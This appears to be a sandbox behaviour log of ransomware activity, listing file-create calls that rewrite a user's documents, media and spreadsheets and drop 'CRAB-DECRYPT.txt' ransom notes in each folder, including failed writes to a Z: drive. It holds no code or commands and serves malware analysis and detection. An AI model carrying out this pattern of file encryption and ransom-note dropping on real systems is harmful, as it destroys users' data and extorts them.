Create C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2kU40FT5jILta3Q.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\XmnJxoBkEp9WD4cyN.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2yagpCprWdKgC2scR.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\KtzEQVEZQWFLdAY3Qn.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\h4pimh4sgK50.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\sbZAE.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\iaY8BIN_Ck.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\ukO9D2qllnBsxnQ.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\UsVrBfwU9tuC5KFqX2K.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\lixRrd6cN_iDgM01kX.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\gr07JV38A.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\VFrEBVJ.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\BhX74jJaOIdhyhcSe5G9.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\Bprz1OZFvY6Fdl.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\cBGy__kii3.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\xQ6SLR9y03J4ITfu7P.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\dh6vAu4ORBB.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\4z3uag.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\DOC6131166051-PDF.js desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\DuYjI_5DnwCjkTeKrN.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\BokNObz8UcZzwf.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\eXcXexGNR8.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\rYZw8NqY13.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\FGn1g2A5L35Dban.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\Kn7qhmeLrMy5AdqLU92.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\FxUvkMkkJlA0u3uO.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\gQz9z2t2-T6sBFh.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\sDKhau.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\GrVNye2A_G.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\8qGeXH1kIXTzNAwh1.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\hbpLjDWaRc.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\KLQs0N5HQVpYWEwm.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\KOHm3 dV9oyll.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\LjIGlO1g4.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\lv-MFQ.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\991tuWIWnfwOaO.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\MzXcX bzXrqd45Lfz4s.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\LOFKJdnEn4MzMXm.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\PCTxqfmg90.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\pLBOkTAFuYRgMO.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\Q _Vg7gr8H.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\A2LolHZayGTsHiI6.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\2oS82VM\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\2oS82VM\3xZTjcYNMEA.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\RH3IiU0yMrDFNR6DKs.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\2oS82VM\4DdBg.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\2oS82VM\q8_fCWTtYsp.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\2QWqJ.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\40xf9IqVMYI.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\owR x2a.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\iWJTz4KEmPveSMxUQ8.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\TQB8IjiKavnd9-4DZ\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\TQB8IjiKavnd9-4DZ\emVhgx6y97.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\TQB8IjiKavnd9-4DZ\l6Bs1VDS IveszkK_T.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\qU7Og9CaR8xuh.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\XhgAzlnnal4On.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\YLRzWU41I lCyJDHV C6.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\lEAREuPn69.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\vXvj4GLL.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\woCvVol6lG6hpZs1f-.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\YEJo-cDCntFKzkvH4cb.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\qnnrT9SEOOv4oMd88.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\yOuNI.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Desktop\_Wm7kki7DgA3B5.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\eCV9B6Keul.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\-1nTMjoJ7ib3ZR0e.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\pWw3Texk6CwVcTz.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\0Ai_ wHAH.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\1PJlex.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\1ulDdE.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\TkryzlAhWDjxy.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\2Hv5hFFMzd5aNPk.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\2LGO84j-W4Ss.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\NXOcFmcZH0kfs1V2.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\3qZsnXbZ8z1egA.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\3SReUsWYQe.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\4pdLU7.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\cxc1c8A9xEZm1pp.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\4RmmFCk0BX7QahWLqVx5.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\5vN57VGzAE.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\FsFwfuaCG.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\6eUPbghm7ZBluxc.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\6ng6JlXHb8hwuQ.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\7oAyWmRuk6Rev8e.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\7_Zy.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\95qK9jgeM.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\9ck.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\1F9dzJR3Dq.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\A8oskYh.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\B1zUmc.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\BHVRr3kYc.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\BkxfwmXNXil_cYhxfQs.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\CBQF.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\o4isx.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\CJMNuW 4cb0wpI.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\D1dhLhbgxoT.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\d2JVpicU.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\dLkR7Xv.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\DP6fTEj02K06.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\2XzzHT1hfS0s9l.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\DZBYR6C6eJk cv.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\ea-CnW.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\eCeaLvu8v-ssV7jBsi.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\EJg4n2H-eOKc-FT-vy.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\eTgm6R0B9s.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\fQ9SmMLDV5wcEGYOA.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\m9asRMP8HoSL6.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\fXjGYhYKUU9N5 9E.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\ggEd2ZFiTn.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\Gj1AETY8gGZf_ZpBFT.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\gUtLmVES.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\H68iskuDWS.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\HbIBqmIdwFh5l3CkQWW.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\PlmVZkn.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\HGetLP aV.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\i-UF7_g9OFxd.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\JPYL7tZbQpiqjE0ymjrJ.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\JVuFz.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\jXQiT7GR.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\D9xhD4Vtl9zeKaqi.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\K5Mygl.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\LHGY.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\Mc2EgDqsDljYTmV.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\mCux0hJieHBSy1 5U1.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\mFFs.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\diCHxx1R37p96mJV.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\MfNXQZkG0M.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\mJGjStuw.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\MMcXOPb7kn8VzqaF4K.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
